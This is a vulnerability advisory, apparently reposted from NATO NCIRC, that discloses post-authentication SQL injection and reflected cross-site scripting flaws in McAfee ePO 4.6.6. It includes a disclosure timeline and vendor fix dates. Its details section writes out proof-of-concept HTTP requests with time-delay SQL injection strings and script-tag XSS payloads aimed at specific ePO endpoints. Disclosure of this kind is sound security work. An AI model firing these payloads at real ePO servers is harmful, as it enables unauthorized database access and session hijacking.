SecurityvulnsSECURITYVULNS:DOC:29548Multiple vulnerabilities in McAfee ePO 4.6.6
Classification: NON SENSITIVE INFORMATION RELEASABLE TO THE PUBLIC
Multiple vulnerabilities in McAfee ePO 4.6.6
Affected Product:
McAfee ePO 4.6.6 Build 176 & (potentially) earlier versions
Timeline:
08 June 2013 - Vulnerability found
12 June 2013 - Vendor informed
12 June 2013 - Vendor replied/confirmed & opened service ticket
12 July 2013 - Vendor responded with dates for solutions
Credits:
Nuri Fattah of NATO / NCIRC (www.ncirc.nato.int)
CVE: To be assigned
NCIRC ID: NCIRC-2013127-01
Description:
Multiple vulnerabilities, such as Cross-Site Scripting (XSS) and SQL
injection were identified in the latest version of McAfee ePO (4.6.6).
All identified vulnerabilities were discovered post authentication.
Vulnerability Details:
- SQL injection
a. GET
/core/showRegisteredTypeDetails.do?registeredTypeID=epo.rt.computer&uid=
6waitf
or%20delay'0%3a0%3a20'–
&index=0&datasourceID=&orion.user.security.token=2LoWTAOfWJ4ZCjxY&ajax
Mode=standard HTTP/1.1
b.
/EPOAGENTMETA/DisplayMSAPropsDetail.do?registeredTypeID=epo.rt.computer
&uid=1;%20WAITFOR%20DELAY%20'0:0:0';–
&datasourceID=ListDataSource.orion.dashboard.chart.datasource.core.query
Factory
%3Aquery.2&index=0 HTTP/1.1
McAfee Solution:
Item "a" will be addressed in ePO 4.6.7 due out in late Q3 2013.
Item "b" has been addressed per Security Bulletin SB10043.
(https://kc.mcafee.com/corporate/index?page=3Dcontent&id=3DSB10043)
- Reflected XSS
a. POST /core/loadDisplayType.do HTTP/1.1=20
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&ins
tanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCp
y3ldihsCW&ajaxMode=standard
b. POST /console/createDashboardContainer.do HTTP/1.1
displayType=text_lookup&operator=eq&propKey=EPOLeafNode.AgentVersion&ins
tanceId=<script>alert(182667)</script>&orion.user.security.token=ZCFbpCp
y3ldihsCW&ajaxMode=standard
c. POST /console/createDashboardContainer.do HTTP/1.1
elementId=3DcustomURL.dashboard.factory%3Ainstance&index=3D2&pageid=3D30
&
width=3D1118&height=3D557&refreshInterval=3D5&refreshIntervalUnit=3DMIN&
filteringEnabled=3Dfalse&mo
nitorUrl=3Dhttp%3A%2F%2Fwww.xxxx.com"/></iframe><script>alert(111057)</s
cript>&orion.user.sec
urity.token=3D9BslgbJEv2JqQy3k&ajaxMode=3Dstandard
d. GET
/ComputerMgmt/sysDetPanelBoolPie.do?uid=1";</script><script>alert(147981
)</script>&orion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard
HTTP/1.1
e. GET
/ComputerMgmt/sysDetPanelQry.do?uid=<script>alert(149031)</script>&orion
.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
f. GET
/ComputerMgmt/sysDetPanelQry.do?uid=>"'><script>alert(30629)</script>&or
ion.user.security.token=>"'><script>alert(30629)</script>&ajaxMode=>"'><
script>alert(30629)</script> HTTP/1.1
g. GET
/ComputerMgmt/sysDetPanelSummary.do?uid=<script>alert(146243)</script>&o
rion.user.security.token=ZCFbpCpy3ldihsCW&ajaxMode=standard HTTP/1.1
h. GET
/ComputerMgmt/sysDetPanelSummary.do?uid=>"'><script>alert(30565)</script
> &orion.user.security.token=>"'><script>alert(30565)</script>&ajaxMode=>
"'><script>alert(30565)</script> HTTP/1.1
McAfee Solution:
Each of these items will be addressed in ePO 4.6.7 due out in late Q3
2013.